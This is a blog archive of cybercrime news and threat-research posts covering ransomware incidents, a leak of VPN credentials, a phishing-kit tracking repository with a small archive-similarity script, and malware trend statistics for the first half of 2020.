Category Archives: cyber crime

City of Lafayette (Colorado) paid $45,000 ransom after ransowmare attack

The City of Lafayette, Colorado, USA, has been forced to pay $45,000 because they were unable to restore necessary files from backup.

On July 27th, the systems at the City of Lafayette, Colorado, were infected with ransomware, the malicious code impacted phone services, email, and online payment reservation systems.

The City did not immediately disclose the cause of the outage of its systems and invited the citizens to use 911 or an alternate number for emergency services.

Now the City of Lafayette admitted they were a victim of a ransomware attack that encrypted its systems and confirmed that opted to pay a $45,000 ransom to receive a decryption tool to recover its files.

“After a thorough examination of the situation and cost scenarios, and considering the potential for lengthy inconvenient service outages for residents, we determined that obtaining the decryption tool far outweighed the cost and time to rebuild data and systems,” City of Lafayette Mayor Jamie Harkins explained in a video.

The City did not disclose technical details of the hack either the family of ransomware that infected its systems, it only stated that it does not believe any data was stolen. The City also added that credit card data was not stored on its systems, anyway it invited residents and employees to monitor their bank accounts for suspicious activity.

“Financial data appears to be recoverable from unaffected backups. Personal credit card information was not compromised, as the City uses external PCI-certified payment gateways.” reads the announcement published by the City. “There is no evidence to suggest personal data was compromised, but out of an abundance of caution, residents and employees are advised to be vigilant to monitor accounts for suspicious activity.”

The City is going to notify individuals who have personal information stored on the City’s network.

The small amount of money requested by the attackers suggests that the attackers are not one of the major ransomware gangs, like Maze, REvil, or Clop, that usually asks for a higher ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, City of Lafayette)

The post City of Lafayette (Colorado) paid $45,000 ransom after ransowmare attack appeared first on Security Affairs.

Avaddon ransomware operators have launched their data leak site

Avaddon ransomware operators, like other cybercrime groups, decided to launch a data leak site where publish data of victims who refuse to pay a ransom demand.

Avaddon ransomware operators announced the launch of their data leak site where they will publish the data stolen from the victims who do not pay a ransom demand.

The first group to adopt this strategy was the Maze ransomware gang in December 2019, since then other crews adopted the same stratefy, including REvil, Nefilim, and Netwalker.

The threat of exposing the victim’s sensitive data is used by the gang to force them into paying a ransom.

Cybersecurity intelligence firm Kela was the first to report that the Avaddon ransomware operators have announced on a Russian-speaking hacker forum their new data leak site.

Source BleepingComputer

The hackers have already published on the leak site 3.5MB of documents stolen from a construction company.

Let’s wait for new entries on the leak site!

Pierluigi Paganini

(SecurityAffairs – hacking, Avaddon)

The post Avaddon ransomware operators have launched their data leak site appeared first on Security Affairs.

Nefilim ransomware operators claim to have hacked the SPIE group

Nefilim ransomware operators allegedly targeted the SPIE group, an independent European leader in multi-technical services.

Researchers from threat intelligence firm Cyble reported that Nefilim ransomware operators allegedly hacked The SPIE Group, an independent European leader in multi-technical services.

The number of ransomware attacks continues to increase, hackers also steal victims’ data and threaten them to release the stolen info if they don’t pay the ransom.

During darkweb and deepweb monitoring, the Cyble Research Team discovered a post from Nefilim ransomware operators in which they claimed to have breached The SPIE Group.

Nefilim ransomware SPIE group

The ransomware gang also revealed to have stolen the company’s sensitive data.

The SPIE Group provides multi-technical services in the areas of energy and communications, it has more than 47,200 employees and in 2019 it reported consolidated revenues of €6.9 billion and consolidated EBITA of €416 million.

Nefilim ransomware operators also released the first batch of file threatens to release other documents. Cyble experts analyzed the material, the first lot of data contains around 11.5 GB.

“The data leak seems to consist of corporate operational documents which include the company’s telecom services contracts, dissolution legal documents, power of attorney documents, infrastructure group reconstructions contracts, and much more.” reported Cyble.

The Nefilim ransomware operators released a total of 65,042 files contained in 18,551 data folders.

Nefilim ransomware operators continue to be very active in this period, recently the group targeted the Dussmann group, the German largest private multi-service provider and Orange S.A., one of the largest mobile networks based in France.

Below a list of tips provided by Cyble to prevent ransomware attacks:

  • Never click on unverified/unidentified links
  • Do not open untrusted email attachments
  • Only download from sites you trust
  • Never use unfamiliar USBs
  • Use security software and keep it updated
  • Backup your data periodically
  • Isolate the infected system from the network
  • Use mail server content scanning and filtering
  • Never pay the ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, SPIE group)

The post Nefilim ransomware operators claim to have hacked the SPIE group appeared first on Security Affairs.

Netwalker ransomware operators claim to have stolen data from Forsee Power

Netwalker ransomware operators breached the networks of Forsee Power, a well-known player in the electromobility market.

A new company has been added to the list of the victims of the Netwalker ransomware operators, it is Forsee Power, which provides advanced lithium-ion battery systems for any mobility application.

The industrial group is based in France and in the US USA, it is one of the market leaders in Europe, Asia, and North America with annual revenue of around $65 million and over 200 employees.

Recently Cyble threat research group came across another disclosure from the Netwalker group that announced to have stolen sensitive data from Forsee Power.

Netwalker ransomware operators announced the attack with a message posted on their online blog and shared a few screenshots as proof of the security breach.

One of the images shared by the group shows a directory containing folders such as Accounts Receivable, Finance, collection letters, Expenses, and Employees. 

Below some tips on how to prevent ransomware attacks provided by Cyble:

  • Never click on unverified/unidentified links
  • Do not open untrusted email attachments
  • Only download from sites you trust
  • Never use unfamiliar USBs
  • Use security software and keep it updated
  • Backup your data periodically
  • Isolate the infected system from the network
  • Use mail server content scanning and filtering
  • Never pay the ransom.

Recently the FBI has issued a security alert about Netwalker ransomware attacks targeting U.S. and foreign government organizations.

The feds are recommending victims, not to pay the ransom and reporting incidents to their local FBI field offices.

The flash alert also includes indicators of compromise for the Netwalker ransomware along with mitigations.

The FBI warns of a new wave of Netwalker ransomware attacks that began in June, the list of victims includes the UCSF School of Medicine and the Australian logistics giant Toll Group.

The Netwalker ransomware operators have been very active since March and also took advantage of the ongoing COVID-19 outbreak to target organizations.

The threat actors initially leveraged phishing emails delivering a Visual Basic Scripting (VBS) loader, but since April 2020, Netwalker ransomware operators began exploiting vulnerable Virtual Private Network (VPN) appliances, user interface components in web apps, or weak passwords of Remote Desktop Protocol connections to gain access to their victims’ networks.

Recently the Netwalker ransomware operators were looking for new collaborators that can provide them with access to large enterprise networks. 

Below the recommended mitigations provided by the FBI:

  • Back-up critical data offline.
  • Ensure copies of critical data are in the cloud or on an external hard drive or storage device.
  • Secure your back-ups and ensure data is not accessible for modification or deletion from the system where the data resides.
  • Install and regularly update anti-virus or anti-malware software on all hosts.
  • Only use secure networks and avoid using public Wi-Fi networks.
  • Consider installing and using a VPN.
  • Use two-factor authentication with strong passwords.
  • Keep computers, devices, and applications patched and up-to-date.

Pierluigi Paganini

(SecurityAffairs – Netwalker ransomware, Forsee Power)

The post Netwalker ransomware operators claim to have stolen data from Forsee Power appeared first on Security Affairs.

Hacker leaks passwords for 900+ Pulse Secure VPN enterprise servers

ZDNet reported in exclusive that a list of passwords for 900+ enterprise VPN servers has been shared on a Russian-speaking hacker forum.

ZDNet has reported in exclusive that a list of plaintext usernames and passwords for 900 Pulse Secure VPN enterprise servers, along with IP addresses, has been shared on a Russian-speaking hacker forum.

ZDNet has obtained a copy of the list with the help of threat intelligence firm KELA and verified confirmed the authenticity of the data.

The list includes:

  • IP addresses of Pulse Secure VPN servers
  • Pulse Secure VPN server firmware version
  • SSH keys for each server
  • A list of all local users and their password hashes
  • Admin account details
  • Last VPN logins (including usernames and cleartext passwords)
  • VPN session cookies

According to Bank Security, all the Pulse Secure VPN servers included in the list were vulnerable to the CVE-2019-11510 flaw.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

“Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability.” reads the advisory.

The vulnerability could be easily exploitable by using publicly available proof-of-concept code.

In august 2019, researchers from BadPackets analyzed the number of Pulse Secure VPN endpoints vulnerable to the CVE-2019-11510. Using the online scanning service BinaryEdge the researchers found 41,850 Pulse Secure VPN endpoints exposed online, 14,528 of them vulnerable to CVE-2019-11510.

Most of the vulnerable hosts were in the U.S. (5,010), followed by Japan (1,511), the U.K. (830) and Germany (789).

CVE-2019-11510

The researchers also analyzed the distribution of the vulnerable hosts by industry and discovered that the flaw affects hosts in:

According to BadPacket, 677 out of the 913 unique IP addresses found in the list were detected by Bad Packets CTI scans to be vulnerable to CVE-2019-11510 immediately after the exploit was made public in 2019.

  • U.S. military, federal, state, and local government agencies
  • Public universities and schools
  • Hospitals and health care providers
  • Electric utilities
  • Major financial institutions
  • Numerous Fortune 500 companies

Likely the threat actors who compiled this list scanned the internet for Pulse Secure VPN servers between June 24 and July 8, 2020, and exploited the CVE-2019-11510 vulnerability to gather server details.

Companies on the list have to update their Pulse Secure servers and of course, change their passwords.

ZDNet researchers pointed out that ransomware operators could use the leaked credentials to target large enterprise.

“Making matters worse, the list has been shared on a hacker forum that is frequented by multiple ransomware gangs. For example, the REvil (Sodinokibi), NetWalker, Lockbit, Avaddon, Makop, and Exorcist ransomware gangs have threads on the same forum, and use it to recruit members (developers) and affiliates (customers).” reported ZDNet.

Pierluigi Paganini

(SecurityAffairs – hacking, Pulse VPN)

The post Hacker leaks passwords for 900+ Pulse Secure VPN enterprise servers appeared first on Security Affairs.

Introducing PhishingKitTracker

If you are a security researcher or even a passionate about how attackers implement phishing you will find yourself to look for phishing kits. A phishing kit is not a phishing builder, but a real implementation (actually re-implementation) of a third party website built to lure your victim. Initially attackers use a phishing builder to “clone” the original web site but after that they introduce – in the fresh re-generate website – interesting ad-dons such as for example: evasion techniques (in order to evade to phishing detectors), targeted elements (in order to targetize the victims), fast re-directors ( to follows the attack chain into the original web-site or to a relay to try to infect you) and sometimes exploit-kits to try to exploit your browser before letting you go.

Credit: Alen Pavlovic (here)

Motivation

There are places where you can buy PhishingKits, for example BleepingComputer wrote a great article on that here, but if you want to get them for free in order to study attack schema and Kit-composition you don’t’ find collections for free. So I decided to share my PhishingKit Tracker, updated automatically by my backend engine every day for study and research purposes.

You can find it HERE (PhishingKitTracker github repo)

Disclaimer

This repository holds a collection of Phishing Kits used by criminals to steal user information. Almost every file into the raw folder is malicious so I strongly recommend you to neither open these files, nor misuse the code to prank your friends. Playing with these kits may lead to irreversible consequences which may affect anything from personal data to passwords and banking information.

I am not responsible for any damage caused by the malware inside my repository and your negligence in general.

NB: Large File System Hahead

PhishingKitTracker is stored into Git Large File System (git-lfs) due to the big amount of data tracked. You should install git-lfs before cloning this repository.

RAW Data

In raw folder are tracked the Phishing Kits in the original format. No manipulation are involved in that data. A backend script goes over malicious harvested websites (harvesting from common sources) and checks if Phishing Kits are in there. In a positive case (if a PhishingKit is found) the resulting file is downloaded and instantly added to that folder. This folder is tracked by using Git Large File System since many files are bigger than 100MB. The “RAW Data” is a quite unexplored land, you would find many interesting topics with high probability. Please remember to cite that work if you find something from here, it would be very appreciated.

STATS

In stats folder are maintained two up-to-date files:

  1. files_name it holds the frequency of the found file-names associate with kits. In other words every phishing kit is saved on the phishing host with a name. filke_name keeps track about every file names and its frequency. If you are wondering why am I not tracking hashes, is because phishing kits are big compressed archives, so it would make no sense at this stage since they always differ each other (but check in src folder for additional information)
  2. sites hols the frequency of the hosting domain names. In other words where the phishing kit was found. No duplicates are tracked by meaning that the frequency and the file names are unique. So for example if you see something like: 3 li.humanbiomics-project.org it means that in li.humanbiomics-project.org have been found three different Phishing Kits over time.

Both of these files have been generate by simple bash scripts like:

  • ls raw/ | cut -d'_' -f1 | uniq -c | sort -bgr > stats/sites.txt
  • ls raw/ | cut -d'_' -f2 | uniq -c | sort -bgr > stats/files_name.txt

these scripts are run on every commit making files inline with the raw folder.

On the other side a file called similarity.csv is provided with a tremendous delay due to the vast amount of time in generating it. That file provides the similarity between the tracked Phishing Kits. It’s a simple CSV file so that you can import it on your favorite spreadsheet and make graphs, statistics or manipulate it in the way you prefer.

SIMILARITY.CSV structure

The similarity structure is like the following one: FileA,FileB,SimilarityAVG,SimilarityMin,SimilarityMax where:

  • FileA is PhishingKit which is considered in that analysis.
  • FileB is the PhishingKit to be compared to PhishingKit FileA
  • SimilarityAVG is the Average in similarity. That average is calculated by computing the similarity check to every single (interesting) file in the PhishingKit archive (FileA) to every single (interesting) file in the PhishingKit archive to be compared (FileB)
  • SimilarityMin is the lowest similarity value found between PhishingKitA and PhishingKitB
  • SimilarityMax is the highest similarity value found between PhishingKitA and PhishingKitB

If you want to generate similarity.csv by your own I provide a simple and dirty script into the src folder. So far it has several limitations (for example it computes ZIP only files). please make pull requests for improving and empower it. Each contribute would be very helpful.

SRC

Please check those variables (compute_similarity.py) and change them at your will.

EXTENSION_FOR_ANALYSIS = ['.html','.js','.vbs','.xls','.xlsm','.doc','.docm', '.ps1']
OUTPUT_FILE =  'similarity.csv'                                                 
RAW_FOLDER = '/tmp/raw/'                                                        
TEMP_FOLDER = '/tmp/tt'     

Once you’ve changed them you can run the script and take a long rest. It will navigate through the RAW_FOLDER, grab the .zip files and tries to compute code similarity between them. At the very end it will save results into OUTPUT_FILE. From now you can import such a a file into your favorite spreadsheet processor and elaborate the code similarity.

So far the python script is able to only compare zip tracked phishingkit, for different compressed format it’s still work in progress.

NB: The Python script is in a super early stage of development. Please help to improve it.

How to contribute

Introducing the walking script for different compression formats. In other words if you want to contribute you can write a new section such as the following one (code_similarity.py) but for different compression extensions such as: .tar.gz, .tar, .rar. /7z and so on and so forth.

# Extracts Zip files based on EXTENSION_FOR_ANALYSIS. It returns the etire file
# path for future works
def extractZipAndReturnsIntereistingFiles(file_to_extract):
    interesting_files = []
    n_interesting_files = []
    try:
        with ZipFile(file_to_extract, 'r') as zipObj:
            listOfFileNames = zipObj.namelist()
            for fileName in listOfFileNames:
                for ext in EXTENSION_FOR_ANALYSIS:
                    if fileName.endswith(ext):
                        try:
                            zipObj.extract(fileName, TEMP_FOLDER)
                            interesting_files.append(os.path.join(TEMP_FOLDER, fileName))
                        except Exception as e:
                            continue
                    else:
                        n_interesting_files.append(os.path.join(TEMP_FOLDER, fileName))
    except Exception as e :
        return interesting_files
    return interesting_files

One more way to contribute is to make the comparison loop smarter and quicker. You might decide to parallelized task by forking and spawning more process or by changing the way I use multi-threading in this quick and dirty statistic script. In conclusion every working pull is welcomed.

Cite the Phishing Kit

@misc{ MR,
       author = "Marco Ramilli",
       title = "Phishing Kits Tracker",
       year = "2020",
       url = "https://marcoramilli.com/2020/07/13/introducing-phishingkittracker/",
       note = "[Online; July 2020]"
     }

Data Breach – Understanding the severity of it

A data breach is a security gap in which information or data is accessed or stolen without authorization. It is a breach of trust between the owner of the data and the party that accesses it without consent. To put it in simpler terms it a nonconsensual usage of someone’s…

Cyber Threats Trends 6 Months Of Findings

After six months from Cyber Threats Trends launch it’s time to check its main findings. When I decided to develop my own Cyber Threats Observatory I was not sure about its effectiveness and I was even more skeptical about the real usage from international cybersecurity communities. Fortunately many students, researchers and professionals used such a data to write thesis, papers and researches. Many of them cited my work (by adding a link in footnotes or in the reference section), other just dropped a “thank you email”. This was enough for me to decide to mantain Cyber Threats Trends for additional six months. Performing data collection, data analysis and data classification requires a quite expensive back-end, so it needs to be useful for somebody otherwise it would make no sense to maintain such a dedicated infrastructure.

But now let’s take a looks to what it was able to find during the past six months.

Malware Families

The most seen Malware families from January 2020 to June 2020 (6 months of activity) are the following ones:
GrandCrab ~3%
Upatre ~1,9% (!!)
Emotet ~1,8%
TrickBot ~1,25%
It looks like be inline with many available statistics and reports from the 2020 with the only exception on Upatre, which looks like super out of topic in 2020, but I have mostly discussed it here, so today I am quite confident it’s not a wrong classification. Many other families have been seen according to the following graph, but they will not be discussed in the current post.

Malware Families

Looking at the distribution of the top malware families we might focus on figure-out if some temporal pattern would emerge. The following image shows the GrandCarb family distribution over time. It is interesting to see that GrandCrab was mostly active during the last two weeks of March reaching its top detection rate on 2020-03-31 within a delicious frequency rate about 138 unique “findings” in that single day. Contrary it looks like to be less used during the months of May and June 2020.

GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.

From Malpedia

Looking at pattern-wise we might agree there is a kind of frequency inside of it. If you group the date by weeks you might find that GrandCrab is mostly used twice per month. If you consider a “top” (the biggest local maximum detection rate) as the campaign launching day and the following local maximum tops in detection rate (in other words the shorter “tops” or the local maximums) as physiological campaign adjustments, it looks like attackers would take two weeks to harvest profit from previous launched campaign and to prepare new artifacts for the following one.

GrandCrab Ditribution over time

The following graph shows the Upatre family distribution over the past six months.

First discovered in 2013, Upatre is primarily a downloader tool responsible for delivering additional trojans onto the victim host. It is most well-known for being tied with the Dyre banking trojan, with a peak of over 250,000 Upatre infections per month delivering Dyre back in July 2015. In November 2015 however, an organization thought to be associated with the Dyre operation was raided, and subsequently the usage of Upatre delivering Dyre dropped dramatically, to less than 600 per month by January 2016.

From Paloalto Unit42

This is a very interesting graph because Upatre was not longer used since years (I bet since 2016). However it looks like attackers recovered it and re-started to use it from April 2020. Grouping by date you would appreciate a 3 days rhythm meaning that from one “attack wave” to another one it would take an average of 3 days. I will perform additional check on that, but static rules are perfectly matching what we are seeing int the upatre graph.

Upatre Distribution over time

Moving one TrickBot, the following image shows its distribution over time. TrickBot was mostly active during the first months of 2020 in a constant and linear way, while from March to April 2020 it experienced a quite significant speedup. Due to covid thematic campaigns Cyber Threats Trends recorded more TrickBot as never before in such time frame.

A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.

From Malpedia
TrickBot Distribution over time

The following image shows the Emotet Distribution over time. As plausible the Emotet’s distribution follows the TrickBot one. Even if it is not clear the relationship between TrickBot folks and Emotet folks, we are quite accustomed to see these frameworks closely delivered in common campaigns, like for example few months ago when we experienced a lot of Ryuk (ransomware) distribution using Emotet + TrickBot.

While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.

From Malpedia
Emotet Distribution

Some indicators, such as the detection rate in January and the detection rate in June show to us that Emotet is used on these specific months even without TrickBot and it might suggest a different attack delivery procedure highlighting a different threat actor. In other words, comparing TrickBot and Emomet we observe that there are mainly two groups: a group which delivers TrickBot and Emotet together (such as the Ryuk ransom group) and a group which uses Emotet without TrickBot.

Carrier Distribution

Excluding the file type exe, which is the most analyzed file extension in the dropper panorama, we continue to observe many office files as the main Malware carrier. For example Microsoft Word Document within MACRO files are the most observed Malware carrier followed by PDF documents and CDF contents. While PowerShell files are still one of the most emerging threats we have not observed vast amount of Malware delivery on such carrier so far, but we see a revamping in the ancient Microsoft Excel Macro 4.0 as obfuscation technique.

Frequency no EXE

Still quite interesting how that statistics change over time. Indeed PDF and OLE objects are still the most used during the analyzed period of time. Even CDF document are quite common while simple scripts such as “VBscript” of Javascript are slowly decelerate their presence in international statistics.

Conclusion

Developing Cyber Threats Trends has been a great journey ! I had many sleepless nights and additional costs due to a quite big backend network (especially “database speaking”) but I had the opportunity to collect super interesting data and to increase knowledge on malware statistics and on developing distributed systems. Moreover it turned out being a quite useful data collection and trend analysis tool for quite few people out there ! I would definitely keep it on collecting more data !

Is upatre downloader coming back ?

Hi Folks, today I want to share a quantitative analysis on a weird return-match by Upatre. According to Unit42 Upatre is an ancient downloader firstly spotted in 2013 used to inoculate banking trojans and active up to 2016.

First discovered in 2013, Upatre is primarily a downloader tool responsible for delivering additional trojans onto the victim host. It is most well-known for being tied with the Dyre banking trojan, with a peak of over 250,000 Upatre infections per month delivering Dyre back in July 2015. In November 2015 however, an organization thought to be associated with the Dyre operation was raided, and subsequently the usage of Upatre delivering Dyre dropped dramatically, to less than 600 per month by January 2016.

From PaloAlto Unit42

From 2016 until today I’ve never experienced a new Upatre campaign, or something like that, but something looks to be changed. Analyzing the Cyber Threats Trends findings (for an upcoming post) I spotted an interesting revival of the Upatre downloader starting from April 2020. The following image shows what I mean. Zero Upatre findings until April 21 2020 and almost 50 single detections per day since that date. Those statistics are so strange to me, that I need to doubt about that. So let’s take a closer look to it and see if there is some misclassification around.

Upatre Time Distribution

Digging a little bit on that samples by asking a second opinion to VirusTotal it looks like matches are genuine. In order to verify that “revival”, I firstly have taken some random samples (with Upatre classification tag) and then verified on VirusTotal the malware classification and the first submission date. Following an example of the performed checks. As you might see from the following picture, 9 AV classified that sample as Upatre, so we might consider not a “false positive” or a “miss-classificated” sample.

Upatre Correct Classification

The following image shows the “First Submission Date” which is aligned to what I’ve seen on Cyber Threats Trends. If you take some more samples from the following list (IoC Section) you will probably see much more cases similar to that one. I did many checks and I wasn’t able to find mismatches at all, so I decided to write up this post about it.

Upatre First Submission

Conclusion

It’s something very interesting, at least to my understanding, to see an ancient downloader be resumed in such a specific period. Many people starting from April up to today are stuck at home performing what has been called “quarantine” due to COVID pandemic. Curiously during the same time, while people are working from home and potentially have much more free time (since they can’t get out home), this older downloader reappears. Maybe somebody took advantage from this bad situation to resurrect some old tools stored in dusty external hard-drive ?

IoC (3384)

For the complete IoC list check it out: HERE

Poulight- An info-stealing trojan might be teaching you how to play Minecraft

Poulight is an info-stealer trojan which most probably originated in Russia. It is written in the .NET and can collect sensitive information and deliver it to cybercriminals. Ever since its first appearance, it has been growing substantially and taking different forms. The main Infection vector remains spear-phishing emails. It was…

Cybersecurity Trends

Trends are interesting since they could tell you where things are going.

I do believe in studying history and behaviors in order to figure out where things are going on, so that every Year my colleagues from Yoroi and I spend several weeks to study and to write what we observed during the past months writing the Yoroi Cybersecurity Annual Report (freely downloadable from here: Yoroi Cybersecurity Report 2019).

The Rise of Targeted Ransomware

2019 was a breakthrough year in the cyber security of the European productive sector. The peculiarity of this year is not strictly related to the number of hacking attempts or in the malware code spread all over the Internet to compromise Companies assets and data but in the evolution and the consolidation of a new, highly dangerous kind of cyber attack. In 2019, we noticed a deep change in a consistent part of the global threat landscape, typically populated by States Sponsored actors, Cyber-Criminals and Hack-tivists, each one having some kind of attributes, both in motivations, objectives, methods and sophistications.

During the 2019 we observed a rapid evolution of Cyber Crime ecosystems hosting a wide range of financially motivated actors. We observed an increased volume of money-driven attacks compared to previous years. But actors are also involved in cyber-espionage, CEO frauds, credential stealing operations, PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but traditionally much more active in the so called “opportunistic” cyber attacks. Attacks opportunistically directed to all the internet population, such as botnets and crypto-miners infection waves, but also involved in regional operations, for instance designed to target European countries like Italy or Germany as branches of major global-scale operations, as we tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagations waves.
In 2019 like what happened in 2018, Ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast increase in o the Ransomware phenomenon, both in term of newborn ransomware families and also in the ransom payment options, driven by the consolidation of the digital cryptocurrencies market that made the traditional tracking techniques – operated by law enforcement agencies – l less effective due to new untrackable crypto currencies. But these increasing volumes weren’t the most worrying aspect we noticed.

Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive by download attacks and exploit kits, but also very frequently using the email vector. In fact, the “canonical” ransomware attacks before 2019 were characterized by an incoming email luring the victim to open up an attachment, most of the times an Office Document, carefully obfuscated to avoid detection and weaponized to launch some ransomware malware able to autonomously encrypt local user files and shared documents.

During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators, moved into this emerging sector leveraging their infection capabilities, their long term hacking experience and their bots to monetize their actions using new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow up ransomware within infected hosts. A typical example is the Gandcrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

Many major cyber criminal groups developed a sort of malicious “RedTeam” units, lest call them “DarkTeams”. These units are able to manually engage high value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network just after ensuring the deletion of the backup copies. Many times they are also using industry specific knowledge to tamper with management networks and hypervisors to reach an impressive level of potential damage.
Actually, this kind of behaviour is not new to us. Such methods of operations have been used for a long time, but not by such a large number of actors and not with such kind of objectives. Network penetration was in fact a peculiarity of state sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referenced as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
During 2019, we observed a strong game change in the ransomware attacks panorama.

The special “DarkTeams” replicated advanced intrusion techniques from APT playbooks carrying them into private business sectors which were not traditionally prepared to deal with such kinds of threats. Then, they started to hit organizations with high impact business attacks modeled to be very effective for the victim context. We are facing the evolution of ransomware by introducing Targeted Ransomware Attacks.

We observed and tracked many gangs consolidating the new Targeted Ransomware Attacks model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operation of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they only were the tip of the iceberg. Many other criminal groups have consolidated this kind of operations such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shame of their victims. Maze was one of the first actors pionering this practice in 2019: the group started to disclose the name of the private companies they hacked into along with pieces of internal data stolen during the network intrusions.

The problem rises when the stolen data includes Intellectual Property and Personal Identifiable Information. In such a case the attacker leaves the victim organization with an additional, infaust position during the cyber-crisis: handling of the data breach and the fines disposed by the Data Protection Authorities. During 2020 we expect these kinds of practices will be more and more common into the criminal criminal ecosystems. Thus, adopting a proactive approach to the Cyber Security Strategy leveraging services like Yoroi’s Cyber Security Defence Center could be crucial to equip the Company with proper technology to acquire visibility on targeted ransomware attacks, knowledge, skills and processes to spot and handle these kind of new class of threats.

Zero-Day Malware

Well Known threats are always easier to be recognized and managed since components and intents are very often clear. For example a Ransomware, as known today, performs some standard operations such as (but not limited to): reading file, encrypting file and writing back that file. An early discovery of known threat families would help analysts to perform quick and precise analyses, while unknown threats are always difficult to manage since analysts would need to discover firstly the intentions and then bring back behaviour to standard operations. This is why we track Zero-Day Malware. Yoroi’s technology captures and collects samples before processing them on Yoroi’s shared threat intelligence platform trying to attribute them to known threats.

As part of the automatic analysis pipeline, Yoroi’s technology reports if the malicious files are potentially detected by Anti-Virus technologies during the detection time. This specific analogy is mainly done to figure-out if the incoming threat would be able to bypass perimetral and endpoint defences. As a positive side effect we collect data on detected threats related to their notoriety. In other words we are able to see if a Malware belonging to a

threat actor or related to specific operation (or incident) is detected by AV, Firewall, Next Generation X and used endpoints.
In this context, we shall define what we mean for Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of arbitrary malware families. The following image (Fig:1) shows how most of the analyzed Malware is unknown from the InfoSec community and from common Antivirus vendors. This finding supports the even evolving Malware panorama in where attackers start from a shared code base but modify it depending on their needed to be stealth.

Immagine che contiene dispositivo, disegnando

Descrizione generata automaticamente

The reported data are collected during the first propagation of the malicious files across organizations. It means Companies are highly exposed to the risk of Zero-Day malware. Detection and response time plays a central role in such cases where the attack becomes stealth for hours or even for days.
Along with the Zero-Day malware observation, most of the known malware at time of delivery have not so high chances of being blocked by security controls. The 8% of the malware is detected by few AV engines and only 33% is actually well identified at time of attack. Even the so-called “known malware” is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed only less than 20% of analyzed samples belonging to “not Zero-Day” are detected by more than 15 AV engines.

Drilling down and observing the behavioural classification of the intercepted samples known by less than 5 AntiVirus engines at detection time, we might appreciate that the “Dropper” behaviour (i.e. the downloading or unpacking of other malicious stages or component) lead the way with 54% of cases, slightly decreasing since the 2018. One more interesting trend in the analyzed data is the surprising decrease of Ransomware behaviour, dropping from 17% of 2018 to the current 2%, and the bullish raise of “Trojan” behaviours up to 35% of times, more than doubled respect to the 15% of 2018.
This trend endorses the evidence that ransomware attacks in 2019 begun to follow a targeted approach as described in the “The Rise of Targeted Ransomware” section.

Immagine che contiene dispositivo

Descrizione generata automaticamente

A reasonable interpretation of the darkling changes on these data, could actually conform with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, many of the delivered malware are actually a single part of a more complex infection chain. A chain able to install even multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.   

This trend gets another validation even in the Zero-Day malware data set: the samples likely unknown to Info.Sec. community – at the time of delivery –  substantially shifted their distribution from previous years. In particular, Ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan raised from 28% to 52% of cases, showing similar macro variations.

Immagine che contiene dispositivo

Descrizione generata automaticamente

If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

Cyber Security Roundup for April 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, March 2020.

The UK went into lockdown in March due to the coronavirus pandemic, these are unprecedented and uncertain times. Unfortunately, cybercriminals are taking full advantage of this situation, both UK citizens and 
businesses have been hit with a wave of COVID-19 themed phishing emails, and scam social media and text messages (smishing). Which prompted warnings by the UK National Cyber Security Centre and UK Banks, and a crackdown by the UK Government.
Convincing COVID-19 Scam Text Message (Smishing)

I have not had the opportunity to analyse a copy of the above scam text message (smishing), but it looks like the weblink displayed is not as it appears. My guess is the link is not part of the gov.uk domain, but the attacker has used an international domain name homograph attack, namely using foreign font characters to disguise the true address of a malicious website that is linked.

I was privileged to be on The Telegraph Coronavirus Podcast on 31st March, where I was asked about the security of video messaging apps, a transcript of what I advised is here. Further coronavirus cybersecurity advice was posted on my blog, on working from home securely and to provide awareness of coronavirus themed message scams.  It was also great to see the UK payment card contactless limit increased from £30 to £45 to help prevent coronavirus spread.

March threat intelligence reports shone a light to the scale of the cybercriminal shift towards exploiting COVID-19 crisis for financial gains. Check Point Global Threat Index reported a spike in the registration of coronavirus themed domains names, stating more than 50% of these new domains are likely to be malicious in nature. Proofpoint reports for more 80% of the threat landscape is using coronavirus themes in some way.  There has been a series of hacking attempts directly against the World Health Organisation (WHO), from DNS hijacking to spread a malicious COVID-19 app to a rather weird plot to spread malware through a dodgy anit-virus solution

Away from the deluge of coronavirus cybersecurity news and threats, Virgin Media were found to have left a database open, which held thousands of customer records exposed, and T-Mobile's email vendor was hacked, resulting in the breach of their customers and employees personal data.  

